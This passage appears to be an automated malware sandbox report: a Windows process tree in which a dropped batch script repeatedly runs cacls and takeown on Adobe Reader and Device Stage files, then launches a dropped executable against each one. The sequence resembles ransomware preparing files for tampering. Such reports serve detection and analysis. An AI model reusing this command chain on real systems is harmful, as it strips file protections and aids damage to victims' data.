C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵
- Loads dropped DLL
PID:1004 -
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵
- Loads dropped DLL
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵
- Executes dropped EXE
PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵
- Loads dropped DLL
PID:1092 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:1688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:1152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "RTC.der" -nobanner3⤵
- Loads dropped DLL
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "RTC.der" -nobanner4⤵
- Executes dropped EXE
PID:1724
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵
- Loads dropped DLL
PID:1620 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:1932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "end_review.gif" -nobanner3⤵
- Loads dropped DLL
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "end_review.gif" -nobanner4⤵
- Executes dropped EXE
PID:892
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵
- Loads dropped DLL
PID:1156 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:432
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "reviews_joined.gif" -nobanner3⤵
- Loads dropped DLL
PID:228 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "reviews_joined.gif" -nobanner4⤵
- Executes dropped EXE
PID:1636
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵
- Loads dropped DLL
PID:864 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:1220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "server_ok.gif" -nobanner3⤵
- Loads dropped DLL
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "server_ok.gif" -nobanner4⤵
- Executes dropped EXE
PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵
- Modifies file permissions
PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "warning.gif" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "warning.gif" -nobanner4⤵
- Executes dropped EXE
PID:960
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:892
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:1060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:432
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1636
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1124
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:1592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:1076
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "brt.hyp" -nobanner3⤵PID:928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "brt.hyp" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:1928
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:212
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:1652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "eng32.clx" -nobanner3⤵PID:1060
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "eng32.clx" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:1968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵
- Modifies file permissions
PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1592
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:1688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:1156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:884
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:1932
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:864
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1176
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:892
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1124
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:956
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "reviewers.gif" -nobanner3⤵PID:208
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "reviewers.gif" -nobanner4⤵PID:972
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:1060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵
- Modifies file permissions
PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "server_lg.gif" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "server_lg.gif" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:1952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:1928
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵
- Modifies file permissions
PID:1648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:768
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:1156
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:392
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵
- Modifies file permissions
PID:828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "zy______.pfm" -nobanner3⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:1932
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵
- Modifies file permissions
PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "brt.fca" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "brt.fca" -nobanner4⤵PID:1648
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "eng.hyp" -nobanner3⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "eng.hyp" -nobanner4⤵PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:864
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:1152
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:1552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:1076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:1932
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:228
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "background.png" -nobanner3⤵PID:432
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "background.png" -nobanner4⤵PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\STlKWzS5.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:1680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c BtmmyzQx.exe -accepteula "resource.xml" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\BtmmyzQx.exeBtmmyzQx.exe -accepteula "resource.xml" -nobanner4⤵PID:1908
-
-
-
